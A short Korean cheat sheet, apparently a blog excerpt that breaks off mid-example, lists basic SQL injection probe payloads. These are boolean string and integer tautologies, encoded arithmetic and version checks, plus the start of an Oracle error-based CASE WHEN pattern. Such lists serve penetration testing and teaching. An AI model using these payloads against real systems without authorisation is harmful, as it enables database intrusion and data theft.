※ SQL INJECTION Basic Pattern 문자열 ' or '1'='1 ' or '1'='2 ' and '1'='1 ' and '1'='2 ' OR '1' LIKE '1 ' OR '1' LIKE '2 ' and '1' LIKE '1 ' and '1' LIKE '2 정수형 or 1=1 or 1=2 and 1=1 and 1=2 id=1+1 (%2B 인코딩 해야함) id=1-1 (%2D 인코딩 해야함) @@version = 5 (Mysql 5버전 인지 확인) @@versionz = 5 (@@versionz 키워드는 없으므로 에러) ※ ORACLE CASE WHEN Condition Pattern 문자열 SELECT * FROM sql_test_a where FIRST_NAME='MIKE' || (SELECT CASE WHEN(1=1) THEN TO_CHAR(1/0) ELSE '' END FROM DUAL) => 문자형 SQL INJECTION 할때는 TO_CHAR 사용 SELE...
원문 링크 : SQL INJECTION 패턴
